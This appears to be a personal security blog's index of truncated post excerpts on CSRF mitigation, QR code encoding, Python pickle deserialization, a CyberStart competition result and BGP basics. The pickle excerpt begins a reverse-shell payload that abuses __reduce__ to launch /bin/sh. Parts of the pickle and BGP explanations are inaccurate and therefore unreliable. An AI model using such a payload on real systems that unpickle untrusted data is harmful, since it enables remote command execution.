Hack the world

Mitigation: referrer check  token: real random and store in the form verification code

A QR code uses four standardized encoding modes  to store data efficiently: numeric : ' 0-9' alphanumeric : ' 0-9，A-Z，空格，$，%，*，+，-，.，/，:' byte/binary :  ISO/IEC 8859-1 kanji  :  Shift JIS JIS X 0208 We are going to talk about the binary data in the QR code. In the data part, it includes data and error correction codewords. Here is an example from the internet:  The 'w' is '01110111' because dark is 0 on even rows 1 on odd rows. The rows are from 0 start from bottom.

Deserialization in python: How it works? There is a library names 'pickle'. When we leverage 'pickle.load', it changes the serialized object completely during serialization because of '__reduce__'. As we know, when we serialize an object, the spacial method like '__init__' will be automatically executed.  Mitigation:  Leverage API like  '__getnewargs()', '__getstate__()' and '__setstate__()' instead. e.g. : reverse shell of pickle: import cPickle import subprocess import base64 class Exploit(object):   def __reduce__(self):     fd = 20     return (subprocess.Popen,             (('/bin/sh',), # args              0,            # bufsize              None,   ...

After more than a month of competition, I got the 1st place in Syracuse university, so I had the opportunity to get the job of ITS and the cyber start essential trainning. Thanks to the school for giving me this platform. I originally wanted to finish 90%, but due to the heavy work and final, I didn't invest much time in the later stage. Here is the url:   https://its.syr.edu/cyberstartwrap/?from=timeline&isappinstalled=0

BGP :  Border Gateway Protocol  ( BGP ) is like a large scale of routers connect autonomous systems(AS) all over the world.  normally, BGP is eBGP , that connects different  AS. On contrast, iBGP is for larger scale of BGP, it used for communication inside BGP.  Small BGP pay larger BGP to traverse data. AS : An autonomous system (AS) is a scope of network which share the same routing prefixes. For example, AS '128.230.0.0/16' has the same 16 bits prefix. Each AS has its own AS number for identify. 3 types of AS Stub Go to one single ISP Multihomed  When one neighbor AS is down, can have other work Will not transit packet for other AS. Transit Provide transit service, transit packet from AS to other AS.  How BGP works? Based on TCP change information. Keep sending 'keep alive' to check if they are connected. Use BGP speaker to send BGP ' update ' message to announce which one can reach which one. Wh...